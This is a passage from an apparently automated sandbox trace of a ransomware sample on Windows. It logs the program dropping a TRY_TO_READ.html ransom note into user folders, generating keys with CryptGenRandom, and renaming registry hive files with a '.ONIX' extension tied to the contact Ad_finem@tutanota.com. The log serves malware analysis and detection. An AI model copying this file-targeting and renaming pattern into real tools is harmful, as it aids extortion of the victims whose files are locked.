ftLastWriteTime.dwLowDateTime=0xd8e1f880, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0068.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.581] GetLastError () returned 0x0 [0068.581] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.582] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.582] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.583] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.583] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.583] CloseHandle (hObject=0x468) returned 1 [0068.584] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.584] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.584] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.584] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b530 | out: hHeap=0x410000) returned 1 [0068.584] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0068.584] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.584] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.584] GetLastError () returned 0x0 [0068.584] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.585] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.585] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.586] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.586] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.586] CloseHandle (hObject=0x468) returned 1 [0068.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1948 | out: hHeap=0x410000) returned 1 [0068.586] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0068.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.586] GetLastError () returned 0xb7 [0068.586] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.587] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.587] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.588] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.588] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.588] CloseHandle (hObject=0x468) returned 1 [0068.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b588 | out: hHeap=0x410000) returned 1 [0068.588] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0068.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.588] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.588] GetLastError () returned 0x0 [0068.588] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.589] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.589] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.589] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.589] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48dae8 | out: pbBuffer=0x48dae8) returned 1 [0068.589] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466788 | out: pbBuffer=0x466788) returned 1 [0068.589] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x80) returned 1 [0068.589] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 41 [0068.589] GetProcessHeap () returned 0x410000 [0068.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc2) returned 0x43e3f8 [0068.590] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" [0068.590] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.590] GetProcessHeap () returned 0x410000 [0068.590] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0068.590] CloseHandle (hObject=0xffffffff) returned 0 [0068.590] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1948 | out: hHeap=0x410000) returned 1 [0068.590] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0068.590] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.590] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.590] GetLastError () returned 0x6 [0068.590] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.590] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.590] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.590] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.591] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48dbf0 | out: pbBuffer=0x48dbf0) returned 1 [0068.591] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466798 | out: pbBuffer=0x466798) returned 1 [0068.591] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x80) returned 1 [0068.591] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 46 [0068.591] GetProcessHeap () returned 0x410000 [0068.591] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc) returned 0x477600 [0068.591] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" [0068.591] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.591] GetProcessHeap () returned 0x410000 [0068.591] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0068.591] CloseHandle (hObject=0xffffffff) returned 0 [0068.591] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1948 | out: hHeap=0x410000) returned 1 [0068.591] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0068.591] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.591] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.591] GetLastError () returned 0x6 [0068.591] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.591] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.592] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.592] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.592] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48dcf8 | out: pbBuffer=0x48dcf8) returned 1 [0068.592] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4667a8 | out: pbBuffer=0x4667a8) returned 1 [0068.592] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x80) returned 1 [0068.592] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 46 [0068.592] GetProcessHeap () returned 0x410000 [0068.592] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc) returned 0x477600 [0068.592] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" [0068.592] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.592] GetProcessHeap () returned 0x410000 [0068.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0068.592] CloseHandle (hObject=0xffffffff) returned 0 [0068.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1948 | out: hHeap=0x410000) returned 1 [0068.592] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0068.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.592] GetLastError () returned 0x6 [0068.593] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.593] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.593] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.593] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.593] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48de00 | out: pbBuffer=0x48de00) returned 1 [0068.593] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2740 | out: pbBuffer=0x4b2740) returned 1 [0068.593] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x80) returned 1 [0068.593] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 86 [0068.593] GetProcessHeap () returned 0x410000 [0068.593] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x4b2b28 [0068.593] lstrcpyW (in: lpString1=0x4b2b28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0068.593] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.594] GetProcessHeap () returned 0x410000 [0068.594] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b28 | out: hHeap=0x410000) returned 1 [0068.594] CloseHandle (hObject=0xffffffff) returned 0 [0068.594] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0068.594] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0068.594] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0068.594] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.594] GetLastError () returned 0x6 [0068.594] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.594] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.594] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.594] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.594] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48e010 | out: pbBuffer=0x48e010) returned 1 [0068.594] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2750 | out: pbBuffer=0x4b2750) returned 1 [0068.594] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x80) returned 1 [0068.595] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 123 [0068.595] GetProcessHeap () returned 0x410000 [0068.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x166) returned 0x4b2c50 [0068.595] lstrcpyW (in: lpString1=0x4b2c50, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0068.595] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.595] GetProcessHeap () returned 0x410000 [0068.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2c50 | out: hHeap=0x410000) returned 1 [0068.595] CloseHandle (hObject=0xffffffff) returned 0 [0068.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0068.595] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, 